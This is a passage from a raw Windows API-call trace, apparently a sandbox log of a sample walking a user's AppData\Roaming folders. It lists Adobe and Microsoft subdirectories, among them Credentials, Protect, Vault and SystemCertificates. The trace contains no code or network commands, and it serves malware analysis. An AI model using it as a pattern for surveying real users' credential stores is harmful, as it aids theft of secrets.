ftLastWriteTime.dwHighDateTime=0x1d85401, nFileSizeHigh=0x0, nFileSizeLow=0x10291, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZrueZAMPX.bmp", cAlternateFileName="ZRUEZA~1.BMP")) returned 1 [0266.749] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c89500, ftCreationTime.dwHighDateTime=0x1d84c25, ftLastAccessTime.dwLowDateTime=0x46062d20, ftLastAccessTime.dwHighDateTime=0x1d85401, ftLastWriteTime.dwLowDateTime=0x46062d20, ftLastWriteTime.dwHighDateTime=0x1d85401, nFileSizeHigh=0x0, nFileSizeLow=0x10291, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZrueZAMPX.bmp", cAlternateFileName="ZRUEZA~1.BMP")) returned 0 [0266.750] FindClose (in: hFindFile=0x693090 | out: hFindFile=0x693090) returned 1 [0266.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f188) returned 1 [0266.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f194) returned 1 [0266.750] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x2b [0266.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.750] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x19ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x2b [0266.750] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", nBufferLength=0x105, lpBuffer=0x19ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", lpFilePart=0x0) returned 0x2c [0266.750] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\*"), lpFindFileData=0x19eee0 | out: lpFindFileData=0x19eee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.752] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.753] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0266.753] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0266.753] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0266.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f184) returned 1 [0266.754] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\.", nBufferLength=0x105, lpBuffer=0x19ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x2b [0266.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f134) returned 1 [0266.754] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x19ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x2b [0266.754] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", nBufferLength=0x105, lpBuffer=0x19ec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", lpFilePart=0x0) returned 0x2c [0266.754] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\*"), lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6936d0 [0266.754] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.755] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0266.755] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.756] FindClose (in: hFindFile=0x6936d0 | out: hFindFile=0x6936d0) returned 1 [0266.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f4) returned 1 [0266.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f100) returned 1 [0266.756] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x38 [0266.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.756] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x38 [0266.756] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\", lpFilePart=0x0) returned 0x39 [0266.756] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.757] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.757] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0266.757] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0266.758] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.758] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x38 [0266.758] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2f [0266.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.758] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x19ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2f [0266.758] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x19ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", lpFilePart=0x0) returned 0x30 [0266.758] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\*"), lpFindFileData=0x19eee0 | out: lpFindFileData=0x19eee0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.759] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.759] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0266.759] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e898ff, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0266.760] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0266.760] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0266.760] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0266.760] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0266.760] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0266.761] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0266.761] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0266.761] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0266.761] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0266.761] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling", cAlternateFileName="")) returned 1 [0266.761] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0266.762] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0266.762] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0266.762] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0266.763] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0266.763] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0266.763] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0266.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f184) returned 1 [0266.764] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\.", nBufferLength=0x105, lpBuffer=0x19ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2f [0266.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f134) returned 1 [0266.764] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x19ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2f [0266.764] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x19ec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", lpFilePart=0x0) returned 0x30 [0266.764] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\*"), lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693090 [0266.765] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 